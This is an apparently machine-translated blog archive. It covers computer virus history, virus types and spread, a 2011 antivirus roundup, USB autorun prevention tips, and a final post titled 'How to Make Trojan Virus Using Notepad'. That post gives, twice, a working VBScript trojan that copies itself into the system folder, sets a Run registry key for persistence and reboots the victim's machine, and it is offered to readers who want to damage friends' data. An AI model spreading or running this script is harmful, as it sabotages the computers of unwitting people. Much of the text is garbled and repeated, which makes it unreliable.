OVERVIEW OF VIRUS
1949, John Von Neuman, say "self altering automata theory" which is the result of research mathematicians. 1960, the lab BELL (AT & T), experts in the lab BELL (AT & T) to experiment the theory expressed by john v Neuman, they play around with the theory to a type of game / game. The experts make a program that can reproduce itself and can destroy lawan.Program-made program that is able to survive and destroy all other programs, it will be deemed the winner. This game eventually became a favorite game in each and every time they also realize komputer.semakin lab and began to be aware of this game is because the program created more and more dangerous, so that they do surveillance and strict security.
1980, the program that eventually became known as the "virus" was successfully spread beyond the lab environment, and began circulating in cyberspace. 1980, begin to known viruses that spread in the cyber world.
B.PENGERTIAN VIRUS
"A That program can infect other programs by modifying them to include a copy of itself.A slighty altered virus can spread throughout a computer system or network using the authorization of every user using it to infect Their programs. Every That gets infected programs can also act as a viral infection That Grows "(Fred Cohen)
The first time the term "virus" is used by Fred Cohen in 1984 in the United States. A computer virus named "Virus" because it has some fundamental similarities with the virus in medical terms (biological viruses).
Computer viruses can be interpreted as a computer program biasa.Tetapi have a fundamental difference with other programs, which created the virus to infect other programs, convert, manipulate and even destroying it. There is to be noted here, the virus will infect only when the trigger program or programs that have been infected had been executed, where it differs from the "worm". This paper will not discuss the worm because it would divert us from our later discussion of this virus.
C.KRITERIA VIRUS
A program called the new virus could be said is really true if the virus has at least five criteria:
A. The ability of a virus to get information 2. Ability to examine a program 3. Its ability to multiply and spread 4. His ability to manipulate 5. Its ability to hide itself.
Now will try to explain briefly what is meant the ability of each and why this is necessary.
1.Kemampuan to obtain information
In general, a virus requires a list of the names of files in a directory, for what? so that he can identify what programs will he tulari, such as macro viruses that will infect all files ending in *. doc after the virus was found, this is where the ability to gather information necessary for the virus that can make a list / all data files, continue to sort them by looking for files that can ditulari.Biasanya this data is created when an infected program / virus infected or even the program is executed. The virus will immediately undertake to collect data and put it in the RAM (usually: P), so that when the computer shuts down all the lost data but it will be created each bervirus program is run and are usually made as a hidden file by the virus.
2.Kemampuan check divulging program
A virus must also be biased to examine a program that will be infected, for example, he served infect program extension *. Doc, he should check whether the document file has been infected or not, because if it is then he will be useless infecting her 2 times. This is very useful to enhance the ability of a virus infecting one in terms of speed of file / program.Yang common practice is to have a virus / mark the file / program that has infected so it is easy to recognize by the virus. Examples of such labeling is to give a unique byte in every file that has been infected.
3.Kemampuan to multiply
If this virus emang "bang-get", this does not mean without the virus. The core of the virus is the ability mengandakan itself by infecting other programs. A virus has been found when his victim (either a file or program) then it will recognize it by check, if not already infected then the virus will begin to infect the action by writing a byte identifier in the program / file, and so on mengcopikan / write the object code of the virus above the file / program infected. Some common ways the virus to infect / reproduce itself is:
a.File / Program to be infected deleted or renamed. then created a file using that name with the virus (ie virus changed his name to the name of the deleted file) b.Program virus is already in execution / loads into memory will directly infect other files by riding the entire file / program.
4.Kemampuan held manipulation
Regular (routine) owned by a virus will be started after a virus infects a file / program. contents of this routine can range from the lightest to the destruction.This routine use of the ability of an operating system (Operating System), so it has the same ability to those of the operating system. for example:
a.Membuat image or message on the monitor B.Change / change change the label of each file, directory, or the label of the drive in pc c.Memanipulasi program / file is infected d.Merusak program / file e.Mengacaukan printer working, etc.
Hiding himself 5.Kemampuan
Hiding is the ability of self to be possessed by a virus so that all the good work from the beginning to the success of transmission can terlaksana.langkah the usual steps are:
-The original program / virus is stored in coded form and machines combined with other programs that are considered useful by the user. -Virus program is put on the boot record or track that is rarely noticed by the computer itself -Virus program is made as short as possible, and the infected file does not change its size -The virus does not change the description of the time a file , Etc.
D.SIKLUS LIFE VIRUS
Virus life cycle in general, through four stages:
o Dormant phase (Phase Rest / Sleep) In this phase the virus is not active. The virus is activated by a particular condition, such as: the date specified, the presence of another program / execution of other programs, etc.. Not all of the virus through this phase
o Propagation phase (Phase Distribution) In this phase the virus copies itself to a program or to a place of storage media (both hard drives, ram, etc.). Each infected program would be the "klonning" virus (depending on how the virus infects)
o Trigerring phase (Phase Active) In this phase the virus is active and this will also trigger by several conditions such as the Dormant phase
o Execution phase (Execution Phase) At this phase the virus that have been active earlier will perform its function. Such as deleting files, display messages, etc.
E.JENIS - TYPE VIRUS
To further refine our knowledge about the virus, I'll try to give an explanation of the types of viruses that often roam the cyber world.
Macro 1.Virus This type of virus must have been very often we dengar.Virus is written with the programming language of an application rather than the programming language of an Operating System. The virus can run its constituent if the application can run properly, that is if the computer can run applications mac word so this virus works on a Mac computer operating system. virus samples:
W97M-variant, ie the length of 1234 bytes W97M.Panther, akanmenginfeksi normal.dot and infect the document when opened. -WM.Twno.A; TW 41 984 bytes long, it will infect Ms.Word document that uses a macro language, usually the extension *. DOT and *. DOC , Etc.
2.Virus Boot Sector Boot sector viruses are common in all these menyebar.Virus reproduce itself will remove or replace the original boot sector virus boot program. So when there is booting the virus will be loaded kememori and then the virus will have the ability to control the standard hardware (ex :: monitor, printer, etc.) and from memory it also will spread eseluruh drives and connected kekomputer (ex: floppy, other drives other than drive c). virus samples: -Variant virus wyx ex: wyx.C (B) infect the boot record and floppy; length: 520 bytes; characteristics: memory resident and encrypted) -Variant of V-sign: infect the Master Boot Record; length of 520 bytes; characteristics: resident in memory (memory resident), encrypted, and polymorphic) 4th-Stoned.june / bloody!: infect: Master boot record and floppy; length of 520 bytes; characteristics: resident in memory (memory resident), encrypted and displays the message "Bloody! june 4th 1989" after the computer boots 128 times
3.Stealth Virus This virus will master table in DOS interrupt table that we often refer to as "Interrupt interceptor". virus is capable of instruction-level instructions to control the DOS and usually they are hidden as well as a full name or size. virus samples: -Yankee.XPEH.4928, infect the file *. COM and *. EXE; length of 4298 bytes; characteristics: resident in memory, ukurantersembunyi, has a trigger -WXYC (which includes any boot record category for entering stealth kategri also included here), an infected floppy motherboot record; length of 520 bytes; resident in memory; size and hidden viruses. -Vmem (s): infect files *. EXE, *. SYS and *. COM; fie 3275 bytes long; characteristics: resident in memory, the size of the hidden, in the encryption. , Etc.
4.Polymorphic Virus The virus is designed to make misleading antivirus program, meaning that the virus is always trying to avoid being recognized by the anti-virus is always changing the way the fox
virus samples:
-Necropolis A / B, infect a file *. EXE and *. COM; file 1963 bytes long; characteristics: resident in memory, the size and tesembunyi virus, encrypted, and can change the structure change -Nightfall, infect a file *. EXE; file 4554 bytes long; characteristics: resident in memory, the size and tesembunyi virus, has a trigger, terenkripsidan can change the structure , Etc.
5.Virus File / Program This virus infects files that can be executed directly from the operating system, whether it's application file (*. EXE), or *. COM is usually also the result of infection from this virus can be detected by changes in the size of the file that attacked.
Partition 6.Multi Virus This virus is a combination dariVirus boot sector and file viruses: that the work performed resulted in two, that he can infect the files *. EXE and also infect the Boot Sector.
HOW TO SPREAD VIRUS F.BEBERAPA
Viruses as biological virus must have spread to the media, computer viruses can spread control every aspect of your computer / other engines are also a number of ways, including:
1.Disket, storage media R / W External storage media can be an easy target for viruses to be used as media. Well as a place to stay or as a distribution medium. Media bias operation R / W (read and Write) is carrying the virus and allow it to serve as a distribution medium.
2.Jaringan (LAN, WAN, etc.) The relationship between multiple computers directly it is possible to move part of a virus when there is exchange / executing the file / program containing the virus.
3.WWW (internet) It is likely an accident in the plant site of a 'virus' that will infect computers that access it.
4.Software a Freeware, Shareware or even pirated Many viruses that are deliberately planted in a good program that disseminate free of charge, or trial version that would have a virus embedded in it.
5.Attachment on email, transferring files Almost all types of viruses these days use the email attachment is because all internet service users must use email to communicate, these files are intentionally striking / attract attention, and often have a double extension on the file naming.
G.PENANGULANGANNYA
1.Langkah-Steps for Prevention For prevention you can do some of the following steps: o Use Antivirus updatean you trust with the latest, never an appun matter as long as the brand is always updated, and turn on the Auto protect o Always scan all external storage media that will be used, perhaps it is a bit inconvenient, but if you work Autoprotect anti virus can be passed to this procedure. o If you are connected directly to the Internet try to combine your Antivirus with Firewall, Anti-spamming, etc.
Once Lagkah 2.Langkah-Infected
o Detection and determine roughly where the source of the virus if the diskette, network, email, etc., if you are connected to the network then there is a good idea to isolate your computer first (either by unplugging or disabling of the control panel) o Identify and classify what type of virus that attacks your pc, by the way: - The symptoms, such as: messages, files are corrupted or lost, etc. - Scan with your antivirus, if you are hit while walking Autoprotect vius definition in the computer means you do not have data of this virus, try to update manually, or download a virus definitionnya for your install. If the virus is blocking your attempt to update it, try to use other media (computer) with the latest antivirus updatean. o Clean up after you successfully detected and recognized it immediately try to find ways of removal or to destroy it at sites that provide information on the progress of the virus. It's if the latest antivirus updates you do not succeed destroy it.
Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts
Wednesday, April 11, 2012
10 and 10 Best Antivirus Deadly Virus
BitDefender Antivirus Pro 2011
BitDefender Antivirus Pro 2011 has comprehensive features and is very easy to use, new features of this antivirus is owned serach Advisor, which integrates a built-in browser that will provide protection when browsing on the internet. There are also features Active Virus Control is designed to detect and mengahapus hidden security threats. BitDefender Antivirus Pro shortcomings of this is to use slightly more resources on the computer yet so user will not feel it.
Kaspersky Anti-virus 2011
Kaspersky Labs again be one of the popular security vendor to issue a antivirus product. Kaspersky Antivirus 2011 promises comfort and a more modern level of security without sacrificing the performance of your computer. With new feature namely Desktop Security Gadget, System Watcher Technologybeberapa some improvements in its products. Is most effective in combating malware antivirus, easy to use but unfortunately quite expensive.
Webroot Antivirus 2011
Webroot Antivirus 2011 combines antivirus protection from Sophos with Spysweeper which is one of the best antispyware program, webroot antivirus easy to operate and have features of effective protection and performance. Spy Sweeper features address the threats and interference from adware, pop-ups, as well as rootkit while browsing on the internet as well as inform the user can overcome the threat so that it appropriately. Disadvantages of this antivirus feature is not available battery saving and rescue CD.
Norton AntiVirus 2011
Norton Antivirus 2011 is an increase of ari features of previous versions and adds some additional features. Symantec / Norton is one of the major players in the antivirus market. In the previous year Norton users are less satisfied with Norton antivirus capabilities because of the amount of resources used and the performance fast enough, but it seems all the shortcomings of previous versions have been addressed in the 2011 version.
ESET NOD32 Antivirus 2011
Provide a strong security protection without interfering with the performance of a computer, with features and advanced heuristic detection diagnostic tool. By implementing a heuristic technology, to help overcome the problem of virus as well as with ThreatSense technology to help protect from a variety of malware. One of these is less than the antivirus features and antiphising IM Protection, ideal for Home users who need security software is simple, easy to install and antivirus that work automatically.
AVG Anti-virus 2011
AVG Anti-Virus 2011 one of the security program of the most widely used, with a simple display suitable for use by a user who wants to be bothered with a variety of security without the configuration. With innovative new features and performance improvements AVG perform better than ever. Link Scanner is a new feature in the 2011 version provides security protection from malware that is currently widely spread through social networking sites. Features PC Analyzer will scan the computer to find registry errors, junk files, disk errors and broken short-cut that can then be repaired.
G DATA AntiVirus 2011
G DATA AntiVirus 2011 provides security protection from malware by using two different scanning engine that is heuristic and self-learning fingerprinting. G DATA is an antivirus program that is quite affordable with a high level of security protection and user friendly interface that allows users to operate this program. However, this antivirus program has a deficiency in the absence of features gamer mode, the battery saving mode and link scanner.
Avira AntiVir 2011
Avira AntiVir Premium has a performance and a balanced security protection, known as cost-effective antivirus software Avira is the right solution to protect PC users from the threat of viruses or malware at this time. Scanner with features capable of scanning all the files that are accessed in a matter of less than one second before the file is opened by the user. Avira Antivir able to create a bootable rescue disk is especially useful when your PC crashes and will not restart normally. But Avira is the lack of heuristic analysis and detection technologies are sometimes overprotective, so blocking or deleting files that are not malware as a threat (false positives).
VIPRE Antivirus 4
VIPRE has the most efficient scanning engine with advanced heuristic technologi, Genscan and Cobra are dynamically able to find the malware before it infects a computer, a Home Site License suitable for use by home users who have more than one PC. With a secure file eraser feature allows users to erase sensitive files permanently without fear of malware or virus threats. But VIPRE Antivirus Installation is not as easy as any other antivirus program.
Trend Micro Titanium Antivirus +
Cloud features that provide protection and security in real-time updates, Trend Micro Titanium antivirus detection malware threats before it infects the computer system. In addition, because some files or portions of the host antivirus online user does not have to worry about the amount of disk space used. Micro trend of focusing more on speed performance so that no additional features or tools in the current version. Although it does not reduce the ability or the essential features of an antivirus, but this is a serious deficiency in which the competitor's antivirus software has improved or added features sophisticated new features in their products.
In addition to maintaining our PC or Notebook with Anti-virus install the greatest though, but still we have to do prevention-prevention alone. For example Prevent Virus from Flash Disk. Flasdisk or USB pendrives now a portable storage medium that is very popular, but also a medium for the spread of virus or trojan number one. To prevent the USB we as a medium for spreading viruses or Trojan on the computer there are several ways to create a file as Autorun.inf file and a file which will prevent the virus to infect, copying or deleting files on the USB.
A more simple way is to download a free application from Panda USB Vaccine panda software, with this software we can protect infected with a virus or trojan Flasdisk. Similar software is the Defender USB, I am more suited to this application, because in addition to portable is also very easy to use. When the USB is plugged into the PC USB Defender will automatically detect it, as does the Panda USB Vaccine application will also remove a virus or trojan that ditemukannya.Berbagai viruses are rampant these days mostly spread through the medium of the flash, when we incorporate flash to the computer we then by default Windows XP will automatically open a new task with the function Auto run / auto play.
Eliminate the function of Auto Run / Auto Play:- Run "gpedit.msc"- Click on Administrative Templates under Computer Configuration- Click the System- Click Turn Off Auto Play- Select Enabled- Drive down to All- OK- Still in Group Policy- Click on Administrative Templates under User Configuration - click the System- Click Turn Off Auto Play- Select Enabled- Drive down to All- OK- Shut down, restart
Other ways Removing malware, viruses, trojans and spyware with HijackThis
HijackThis is an application that can be used to find and remove spyware, viruses, trojans and other malware on the computer. HijackThis logs are made from after the software is run, will help us to know what type of malware, location, and files that may have been infected. But for ordinary users to use HijackThis quite confusing than other similar software.
Never remove any application unless we know or understand that the application has been infected with or carrying malware file that can interfere with computer performance. In the latest version of HijackThis has a feature called AnalyzeThis HijackThis logs will be uploaded to the website TrendSecure and then will compare with the other log, or the user can upload the log to the HijackThis ari Hijackthis.de for later analysis can provide information about any malware contained in the user's computer.Another way that is effective, among others, is to enable the user Guest and always login with the user guest. With the user Guest, indirectly we will turn off the registry. The virus will always manginfeksi this registry file and change the value in it. If you want to install new software, we simply use the "Run As" Administrator of the user guest. And the latter of course is always update the anti virus on a regular basis.
Here's vicious 10 computer viruses we need to know and be aware of are:
A. Storm Worm2. Leap-A/Oompa- A3. Sasser and Netsky4. MyDome (Novarg)5.SQL Slammer / Sapphire6.Nimda7.Code Red & Code Red II8.The Klez9.ILOVEYOU10.Melissa
BitDefender Antivirus Pro 2011 has comprehensive features and is very easy to use, new features of this antivirus is owned serach Advisor, which integrates a built-in browser that will provide protection when browsing on the internet. There are also features Active Virus Control is designed to detect and mengahapus hidden security threats. BitDefender Antivirus Pro shortcomings of this is to use slightly more resources on the computer yet so user will not feel it.
Kaspersky Anti-virus 2011
Kaspersky Labs again be one of the popular security vendor to issue a antivirus product. Kaspersky Antivirus 2011 promises comfort and a more modern level of security without sacrificing the performance of your computer. With new feature namely Desktop Security Gadget, System Watcher Technologybeberapa some improvements in its products. Is most effective in combating malware antivirus, easy to use but unfortunately quite expensive.
Webroot Antivirus 2011
Webroot Antivirus 2011 combines antivirus protection from Sophos with Spysweeper which is one of the best antispyware program, webroot antivirus easy to operate and have features of effective protection and performance. Spy Sweeper features address the threats and interference from adware, pop-ups, as well as rootkit while browsing on the internet as well as inform the user can overcome the threat so that it appropriately. Disadvantages of this antivirus feature is not available battery saving and rescue CD.
Norton AntiVirus 2011
Norton Antivirus 2011 is an increase of ari features of previous versions and adds some additional features. Symantec / Norton is one of the major players in the antivirus market. In the previous year Norton users are less satisfied with Norton antivirus capabilities because of the amount of resources used and the performance fast enough, but it seems all the shortcomings of previous versions have been addressed in the 2011 version.
ESET NOD32 Antivirus 2011
Provide a strong security protection without interfering with the performance of a computer, with features and advanced heuristic detection diagnostic tool. By implementing a heuristic technology, to help overcome the problem of virus as well as with ThreatSense technology to help protect from a variety of malware. One of these is less than the antivirus features and antiphising IM Protection, ideal for Home users who need security software is simple, easy to install and antivirus that work automatically.
AVG Anti-virus 2011
AVG Anti-Virus 2011 one of the security program of the most widely used, with a simple display suitable for use by a user who wants to be bothered with a variety of security without the configuration. With innovative new features and performance improvements AVG perform better than ever. Link Scanner is a new feature in the 2011 version provides security protection from malware that is currently widely spread through social networking sites. Features PC Analyzer will scan the computer to find registry errors, junk files, disk errors and broken short-cut that can then be repaired.
G DATA AntiVirus 2011
G DATA AntiVirus 2011 provides security protection from malware by using two different scanning engine that is heuristic and self-learning fingerprinting. G DATA is an antivirus program that is quite affordable with a high level of security protection and user friendly interface that allows users to operate this program. However, this antivirus program has a deficiency in the absence of features gamer mode, the battery saving mode and link scanner.
Avira AntiVir 2011
Avira AntiVir Premium has a performance and a balanced security protection, known as cost-effective antivirus software Avira is the right solution to protect PC users from the threat of viruses or malware at this time. Scanner with features capable of scanning all the files that are accessed in a matter of less than one second before the file is opened by the user. Avira Antivir able to create a bootable rescue disk is especially useful when your PC crashes and will not restart normally. But Avira is the lack of heuristic analysis and detection technologies are sometimes overprotective, so blocking or deleting files that are not malware as a threat (false positives).
VIPRE Antivirus 4
VIPRE has the most efficient scanning engine with advanced heuristic technologi, Genscan and Cobra are dynamically able to find the malware before it infects a computer, a Home Site License suitable for use by home users who have more than one PC. With a secure file eraser feature allows users to erase sensitive files permanently without fear of malware or virus threats. But VIPRE Antivirus Installation is not as easy as any other antivirus program.
Trend Micro Titanium Antivirus +
Cloud features that provide protection and security in real-time updates, Trend Micro Titanium antivirus detection malware threats before it infects the computer system. In addition, because some files or portions of the host antivirus online user does not have to worry about the amount of disk space used. Micro trend of focusing more on speed performance so that no additional features or tools in the current version. Although it does not reduce the ability or the essential features of an antivirus, but this is a serious deficiency in which the competitor's antivirus software has improved or added features sophisticated new features in their products.
In addition to maintaining our PC or Notebook with Anti-virus install the greatest though, but still we have to do prevention-prevention alone. For example Prevent Virus from Flash Disk. Flasdisk or USB pendrives now a portable storage medium that is very popular, but also a medium for the spread of virus or trojan number one. To prevent the USB we as a medium for spreading viruses or Trojan on the computer there are several ways to create a file as Autorun.inf file and a file which will prevent the virus to infect, copying or deleting files on the USB.
A more simple way is to download a free application from Panda USB Vaccine panda software, with this software we can protect infected with a virus or trojan Flasdisk. Similar software is the Defender USB, I am more suited to this application, because in addition to portable is also very easy to use. When the USB is plugged into the PC USB Defender will automatically detect it, as does the Panda USB Vaccine application will also remove a virus or trojan that ditemukannya.Berbagai viruses are rampant these days mostly spread through the medium of the flash, when we incorporate flash to the computer we then by default Windows XP will automatically open a new task with the function Auto run / auto play.
Eliminate the function of Auto Run / Auto Play:- Run "gpedit.msc"- Click on Administrative Templates under Computer Configuration- Click the System- Click Turn Off Auto Play- Select Enabled- Drive down to All- OK- Still in Group Policy- Click on Administrative Templates under User Configuration - click the System- Click Turn Off Auto Play- Select Enabled- Drive down to All- OK- Shut down, restart
Other ways Removing malware, viruses, trojans and spyware with HijackThis
HijackThis is an application that can be used to find and remove spyware, viruses, trojans and other malware on the computer. HijackThis logs are made from after the software is run, will help us to know what type of malware, location, and files that may have been infected. But for ordinary users to use HijackThis quite confusing than other similar software.
Never remove any application unless we know or understand that the application has been infected with or carrying malware file that can interfere with computer performance. In the latest version of HijackThis has a feature called AnalyzeThis HijackThis logs will be uploaded to the website TrendSecure and then will compare with the other log, or the user can upload the log to the HijackThis ari Hijackthis.de for later analysis can provide information about any malware contained in the user's computer.Another way that is effective, among others, is to enable the user Guest and always login with the user guest. With the user Guest, indirectly we will turn off the registry. The virus will always manginfeksi this registry file and change the value in it. If you want to install new software, we simply use the "Run As" Administrator of the user guest. And the latter of course is always update the anti virus on a regular basis.
Here's vicious 10 computer viruses we need to know and be aware of are:
A. Storm Worm2. Leap-A/Oompa- A3. Sasser and Netsky4. MyDome (Novarg)5.SQL Slammer / Sapphire6.Nimda7.Code Red & Code Red II8.The Klez9.ILOVEYOU10.Melissa
Thursday, April 5, 2012
How to Make Trojan Virus Using Notepad
For science ... for you who want ignorant friend ... n all want data damaged. There cra ni Virus with notepad easy to make.
* note the following copy all the source into notepad save as. vbs (if you want to activate)
if not let it remain in the file exstensi.txt
exampels: ippamd0_trojanHorse.VBS
Copy all the source below:
brakes - dlRB "DL Reboot" Trojan script by D.L.
On Error Resume Next
FSobj dim, sysDir, generateCopy, newfile, fixedCode, procreateCopy, fileData
set FSobj = CreateObject ("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder (1)
createRegKey "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ dlRB", sysDir & "\ dlRB.vbs"
sub createRegKey (regkey, regVal)
set regedit = CreateObject ("WScript.Shell")
regEdit.RegWrite regkey, regVal
end sub
set generateCopy = FSobj.CreateTextFile (sysDir + "\ dlRB.vbs")
generateCopy.close
set newfile = FSobj.OpenTextFile (WScript.ScriptFullname, 1)
setFile ()
fixedCode = replace (fileData, chr (94), "" "")
set procreateCopy = FSobj.OpenTextFile (sysDir + "\ dlRB.vbs", 2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem ()
setFile function ()
fileData = "rem - ^ ^ by D.L. dlRB" & vbCrLf & _
"strComputer = ^. ^" & vbCrLf & _
"Set objWMIService = GetObject (winmgmts ^: ^ _" & vbCrLf & _
"& ^ {ImpersonationLevel = impersonate, (Shutdown)}! \ \ ^ & ^ & StrComputer \ root \ cimv2 ^)" & vbCrLf & _
"Set colOperatingSystems = objWMIService.ExecQuery _ '& vbCrLf & _
"(Select * from Win32_OperatingSystem ^ ^)" & vbCrLf & _
"For Each objOperatingSystem in colOperatingSystems" & vbCrLf & _
"ObjOperatingSystem.Reboot ()" & vbCrLf & _
"Next"
end function
rebootSystem function ()
strComputer = "."
Set objWMIService = GetObject ("winmgmts:" _
& "{ImpersonationLevel = impersonate, (Shutdown)}! \ \" & StrComputer & "\ root \ cimv2")
Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot ()
Next
end function
yes ... do not forget saved?
* note the following copy all the source into notepad save as. vbs (if you want to activate)
if not let it remain in the file exstensi.txt
exampels: ippamd0_trojanHorse.VBS
Copy all the source below:
brakes - dlRB "DL Reboot" Trojan script by D.L.
On Error Resume Next
FSobj dim, sysDir, generateCopy, newfile, fixedCode, procreateCopy, fileData
set FSobj = CreateObject ("Scripting.FileSystemObject")
set sysDir = FSobj.GetSpecialFolder (1)
createRegKey "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ dlRB", sysDir & "\ dlRB.vbs"
sub createRegKey (regkey, regVal)
set regedit = CreateObject ("WScript.Shell")
regEdit.RegWrite regkey, regVal
end sub
set generateCopy = FSobj.CreateTextFile (sysDir + "\ dlRB.vbs")
generateCopy.close
set newfile = FSobj.OpenTextFile (WScript.ScriptFullname, 1)
setFile ()
fixedCode = replace (fileData, chr (94), "" "")
set procreateCopy = FSobj.OpenTextFile (sysDir + "\ dlRB.vbs", 2)
procreateCopy.write fixedCode
procreateCopy.close
rebootSystem ()
setFile function ()
fileData = "rem - ^ ^ by D.L. dlRB" & vbCrLf & _
"strComputer = ^. ^" & vbCrLf & _
"Set objWMIService = GetObject (winmgmts ^: ^ _" & vbCrLf & _
"& ^ {ImpersonationLevel = impersonate, (Shutdown)}! \ \ ^ & ^ & StrComputer \ root \ cimv2 ^)" & vbCrLf & _
"Set colOperatingSystems = objWMIService.ExecQuery _ '& vbCrLf & _
"(Select * from Win32_OperatingSystem ^ ^)" & vbCrLf & _
"For Each objOperatingSystem in colOperatingSystems" & vbCrLf & _
"ObjOperatingSystem.Reboot ()" & vbCrLf & _
"Next"
end function
rebootSystem function ()
strComputer = "."
Set objWMIService = GetObject ("winmgmts:" _
& "{ImpersonationLevel = impersonate, (Shutdown)}! \ \" & StrComputer & "\ root \ cimv2")
Set colOperatingSystems = objWMIService.ExecQuery _
("Select * from Win32_OperatingSystem")
For Each objOperatingSystem in colOperatingSystems
ObjOperatingSystem.Reboot ()
Next
end function
yes ... do not forget saved?
Subscribe to:
Posts (Atom)